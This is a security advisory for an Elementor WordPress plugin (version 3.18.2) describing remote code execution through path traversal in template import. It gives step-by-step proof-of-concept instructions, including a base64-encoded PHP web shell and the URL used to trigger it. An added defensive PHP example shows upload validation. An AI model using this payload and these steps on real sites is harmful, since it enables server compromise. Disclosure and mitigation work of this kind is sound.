Description

The plugin is vulnerable to Remote Code Execution through file upload in the template import functionality, allowing authenticated attackers with contributor-level access and above to upload files and execute code on the server.
1. Edit a post in Elementor.
2. Import a template (folder icon on an Elementor block).
3. Pick any JSON file, and intercept the AJAX request.
4. Replace the file name with “/…/…/…/…/shell.php”
5. Replace the base64 contents (fileData) with “PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=”
6. Visit /wp-content/shell.php?cmd=id to see the RCE.
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 3.18.2 |
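
One way a server-side import handler can reject the request described in the steps above, shown as an added example that is not the plugin's code or its actual fix. The function names `validate_template_import` and `store_template` are hypothetical, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);
// Added example with hypothetical function names; not the plugin's own code.

// Returns the decoded template bytes, or throws if the upload is not a plain JSON template.
function validate_template_import(string $fileName, string $fileData): string
{
    // The client-supplied name must be a bare file name with no directory parts.
    if ($fileName === '' || strpbrk($fileName, "/\\\0") !== false || basename($fileName) !== $fileName) {
        throw new InvalidArgumentException('file name contains a path');
    }
    // Allowlist the extension rather than blocklisting .php and its variants.
    if (strtolower(pathinfo($fileName, PATHINFO_EXTENSION)) !== 'json') {
        throw new InvalidArgumentException('extension not allowed');
    }
    // Strict mode rejects input with characters outside the base64 alphabet.
    $bytes = base64_decode($fileData, true);
    if ($bytes === false) {
        throw new InvalidArgumentException('fileData is not valid base64');
    }
    // A template decodes to a JSON object or array; PHP source does not.
    if (!is_array(json_decode($bytes, true))) {
        throw new InvalidArgumentException('content is not a JSON document');
    }
    return $bytes;
}

// Store under a server-generated name so the client never influences the path.
function store_template(string $bytes, string $dir): string
{
    $path = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.json';
    if (file_put_contents($path, $bytes, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $path;
}

// Constructed sample requests, not captured traffic.
$php = base64_encode('<?php echo 1; ?>');
$samples = [['template.json', base64_encode('{"content":[]}')], ['../shell.php', $php], ['page.json', $php]];
foreach ($samples as [$name, $data]) {
    try {
        $path = store_template(validate_template_import($name, $data), sys_get_temp_dir());
        echo $name, ': accepted, stored as ', basename($path), "\n";
        unlink($path);
    } catch (InvalidArgumentException $e) {
        echo $name, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

The third sample shows why the name check alone is not enough: a `.json` name carrying PHP source is rejected only by the content check.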